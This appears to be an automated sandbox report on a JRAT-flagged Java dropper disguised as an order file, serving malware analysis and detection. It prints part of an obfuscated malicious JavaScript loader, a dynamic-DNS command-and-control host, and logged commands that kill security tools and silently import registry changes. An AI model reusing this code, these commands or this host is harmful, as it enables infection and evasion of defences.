                                                                                                                                                                                                                                  SHA1:279B601CB79C5D1790910C839125A45B2F43101D
                                                                                                                                                                                                                                  SHA-256:4C81C42509988B29C4D77288ED55849DE919676FBCA4A938BF773F893F2E547E
                                                                                                                                                                                                                                  SHA-512:483D03F5DCF0011679463A68F233CB50796C056D1045CC6EEACCAE41FFBE51E562A186F6CD6196B0C3B63631553A7D780D6D77648117903E4D58238B2EF8D198
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                  • Rule: MAL_JRAT_Oct18_1, Description: Detects JRAT malware, Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, Author: Florian Roth
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):47
                                                                                                                                                                                                                                  Entropy (8bit):4.102149223879969
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:3:YwwAHI3zbScnhF+WGMTWSYn:YwwAH+rn+GTWrn
                                                                                                                                                                                                                                  MD5:0CF869478AEC42973B4B6069ADAC0646
                                                                                                                                                                                                                                  SHA1:153F62078DE43DF78115062A71C70160C6CF4857
                                                                                                                                                                                                                                  SHA-256:6BD9E0FC9A53BABB5407535B999FA7ACCBD578596391014BFEABDB42A9C05218
                                                                                                                                                                                                                                  SHA-512:C4641C3E470C068CAB11A3138B4596CAAD88BC73EEB2C28F5BF799B955BF2A594C7E456D437EA53443ABF7D4BCDCA82CBE3475E856F94A3DD95C4806AA6DD7D2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:{"UUID":"59c9cffb-9a92-4e42-9695-f3cc1565f104"}
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (64499), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):968606
                                                                                                                                                                                                                                  Entropy (8bit):5.656538843820354
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:kDl+s5O8GbA13NpCUHVevZ2mA0q/MIqp2web7h1FlJ1yk1EnDjuH3Sq8YG1xWfNB:kks5r19z1UwmAh/2pO5l1OnuXSTG5QK
                                                                                                                                                                                                                                  MD5:1D266565196B28EF3E62398A3FDB63CD
                                                                                                                                                                                                                                  SHA1:D8E7F9D683F3DB330C9225AB708D0A4095F2EEA1
                                                                                                                                                                                                                                  SHA-256:5FC03A19D37C227C9CFE59A5E962956FB46AE2A7969E0CF0EA1F806E201295A0
                                                                                                                                                                                                                                  SHA-512:51F1A887BA9D6886B10263D06811899313DFCB1469EF64F70658875E4A7DA721CF4AEE626C3539762D42183A9A1C17D77CB0B80BC7165DE73481B9E8D261D3A2
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Preview:String["prototype"].proc = function() { eval(this.toString());};..String["prototype"]["\x75\x6E\x64\x65\x66\x69\x6E\x65\x64"] = function(xx, xy) {..for(var h=0;h<3;h++){xx[h+3] = xy[h];}..};..String.\u0070\u0072\u006f\u0074\u006f\u0074\u0079\u0070\u0065.\u006D\u006F\u0075\u0073\u0065 = {mp3: function(){var d = "";for(var i=0; i<this.toString().length; i++){d = eval("var cd = this.toString().substr(i, 1);cd;") + d;}return d;}}.mp3;..var \u006D\u0033\u004D\u006F\u0072\u0059\u006B\u0041\u0064 = [null,..("\x43\x72\x65\x61\x74\x65\x4F\x62\x6A\x65\x63\x74"+"txeTdaeR|".mouse()+"|undefined|\x61\x64\x6F\x64\x62\x2E|"+"noitisoP|teSrahC".mouse()).split("|").concat("epyT".mouse(), "nepO".mouse())];..'String["prototype"].oS3Hm = function(){return [].s0fStu;}'.proc();..var exp = /{(\d+)}/g;var oMut1 = null;..Array.prototype.om0l4d3 = function() {var hYiUrF = \u0061\u0072\u0067\u0075\u006D\u0065\u006E\u0074\u0073; return this[0]["replace"](exp, function(k3tTlE0, k3tTlE1) { try{.return hYiUrF[k3tTlE1]
                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (969), with no line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):969
                                                                                                                                                                                                                                  Entropy (8bit):5.6126827800284165
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:fd1yAISXmGd2lbWlUiwhbCbiLKXogYZi2Xp9Rt5ePdwg6:fdcyKbu4JpZdp9RtB
                                                                                                                                                                                                                                  MD5:C37021210D06216FEF238839A93D416E
                                                                                                                                                                                                                                  SHA1:8DA2D29A4AC2FD619C2A471079981678EB1C60CC
                                                                                                                                                                                                                                  SHA-256:79C7AC4D9C950E2439A204167D2F9684CA2B73C8C909FD2755A59D531E1D7E8B
                                                                                                                                                                                                                                  SHA-512:EDA6FC02274D13BE48A69A03DD9DEBB1452F8BF609D09BBBEF80E2B7C505CE56C05A31293128E5977CFFDFDB0EA565550E407707F25C0E9B1878DBBF6D0E3672
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  File type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                  Entropy (8bit):7.993136790773696
                                                                                                                                                                                                                                  TrID:
                                                                                                                                                                                                                                  • Java Archive (13504/1) 62.80%
                                                                                                                                                                                                                                  • ZIP compressed archive (8000/1) 37.20%
                                                                                                                                                                                                                                  File name:NewOrder - P2D041197.jar
                                                                                                                                                                                                                                  File size:643'693 bytes
                                                                                                                                                                                                                                  MD5:bc34f4e23dca52ed6425b46a3dcf5e95
                                                                                                                                                                                                                                  SHA1:e82affa4fea489146e3deb803efdb561a394073f
                                                                                                                                                                                                                                  SHA256:f77617921c5fb6f8114eca9fe330b8d2bfc3a99c4f581f3f9a8282a31d528aeb
                                                                                                                                                                                                                                  SHA512:2f3a171e9ada6f10b4ed182f5fdb4ec7086f99def55db52f2663980eff2009048b6a240f30c7c9e3ba518b4075c79bc77faa5e613e590f823abc1e613385123a
                                                                                                                                                                                                                                  SSDEEP:12288:Cz396wbsskjH0PljDlBPfPSlU5XhBFDYU1SkzuiSn/BIu9:s39bssOUP1l9fPScXhfg3z
                                                                                                                                                                                                                                  TLSH:D7D423CED8E9EA91B6935C600D34B73AB7D6768D03AB0D70A77C9B1CDEB231500E5582
                                                                                                                                                                                                                                  Icon Hash:d08c8e8ea2868a54
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 17, 2024 07:02:15.524395943 CEST | 55105 | 53 | 192.168.2.4 | 1.1.1.1
Apr 17, 2024 07:02:15.630578041 CEST | 53 | 55105 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Apr 17, 2024 07:02:15.524395943 CEST | 192.168.2.4 | 1.1.1.1 | 0x5124 | Standard query (0) | pnauco5.ddns.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 17, 2024 07:02:15.630578041 CEST | 1.1.1.1 | 192.168.2.4 | 0x5124 | No error (0) | pnauco5.ddns.net | | 103.151.123.225 | A (IP address) | IN (0x0001) | false

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:07:01:52
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                                                  Start time:07:01:52
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

Target ID:2
Start time:07:01:52
Start date:17/04/2024
Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"
Imagebase:0x610000
File size:257'664 bytes
MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:3
Start time:07:01:53
Start date:17/04/2024
Path:C:\Windows\SysWOW64\icacls.exe
Wow64 process (32bit):true
Commandline:C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Imagebase:0xb80000
File size:29'696 bytes
MD5 hash:2E49585E4E08565F52090B144062F97E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:4
Start time:07:01:53
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:07:01:53
Start date:17/04/2024
Path:C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):true
Commandline:wscript C:\Users\user\zbrspjjraf.js
Imagebase:0xad0000
File size:147'456 bytes
MD5 hash:FF00E0480075B095948000BDC66E81F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:6
Start time:07:01:56
Start date:17/04/2024
Path:C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"
Imagebase:0x7c0000
File size:257'664 bytes
MD5 hash:6E0F4F812AE02FBCB744A929E74A04B8
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:7
Start time:07:01:56
Start date:17/04/2024
Path:C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Wow64 process (32bit):true
Commandline:"C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class
Imagebase:0x610000
File size:257'664 bytes
MD5 hash:9DAA53BAB2ECB33DC0D9CA51552701FA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:false

Target ID:8
Start time:07:01:56
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:9
Start time:07:01:58
Start date:17/04/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Imagebase:0x240000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:07:01:58
Start date:17/04/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:07:01:58
Start date:17/04/2024
Path:C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit):true
Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
Imagebase:0xc90000
File size:144'896 bytes
MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:13
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:14
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
                                                                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                                                                  File size:144'896 bytes
                                                                                                                                                                                                                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:15
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:17
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cscript.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
                                                                                                                                                                                                                                  Imagebase:0xc90000
                                                                                                                                                                                                                                  File size:144'896 bytes
                                                                                                                                                                                                                                  MD5 hash:CB601B41D4C8074BE8A84AED564A94DC
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:18
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
                                                                                                                                                                                                                                  Imagebase:0x240000
                                                                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:19
                                                                                                                                                                                                                                  Start time:07:01:58
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:20
                                                                                                                                                                                                                                  Start time:07:01:58
Start date: 17/04/2024
Path: C:\Windows\SysWOW64\cscript.exe
Wow64 process (32bit): true
Commandline: cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
Imagebase: 0xc90000
File size: 144'896 bytes
MD5 hash: CB601B41D4C8074BE8A84AED564A94DC
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 21
Start time: 07:01:59
Start date: 17/04/2024
Path: C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit): true
Commandline: xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Imagebase: 0x760000
File size: 43'520 bytes
MD5 hash: 7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 22
Start time: 07:01:59
Start date: 17/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 23
Start time: 07:01:59
Start date: 17/04/2024
Path: C:\Windows\SysWOW64\xcopy.exe
Wow64 process (32bit): true
Commandline: xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
Imagebase: 0x760000
File size: 43'520 bytes
MD5 hash: 7E9B7CE496D09F70C072930940F9F02C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 24
Start time: 07:01:59
Start date: 17/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 25
Start time: 07:02:10
Start date: 17/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 26
Start time: 07:02:10
Start date: 17/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 27
Start time: 07:02:10
Start date: 17/04/2024
Path: C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit): true
Commandline: taskkill /IM UserAccountControlSettings.exe /T /F
Imagebase: 0xd0000
File size: 74'240 bytes
MD5 hash: CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 28
Start time: 07:02:10
Start date: 17/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
Imagebase: 0x240000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 29
Start time: 07:02:10
Start date: 17/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 30
Start time: 07:02:10
Start date: 17/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

                                                                                                                                                                                                                                  Target ID:31
                                                                                                                                                                                                                                  Start time:07:02:10
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\regedit.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
                                                                                                                                                                                                                                  Imagebase:0x650000
                                                                                                                                                                                                                                  File size:329'728 bytes
                                                                                                                                                                                                                                  MD5 hash:BD63D72DB4FA96A1E0250B1D36B7A827
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:36
                                                                                                                                                                                                                                  Start time:07:02:11
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM ProcessHacker.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:37
                                                                                                                                                                                                                                  Start time:07:02:11
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:38
                                                                                                                                                                                                                                  Start time:07:02:12
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM procexp.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:39
                                                                                                                                                                                                                                  Start time:07:02:12
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:40
                                                                                                                                                                                                                                  Start time:07:02:13
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM MSASCui.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:41
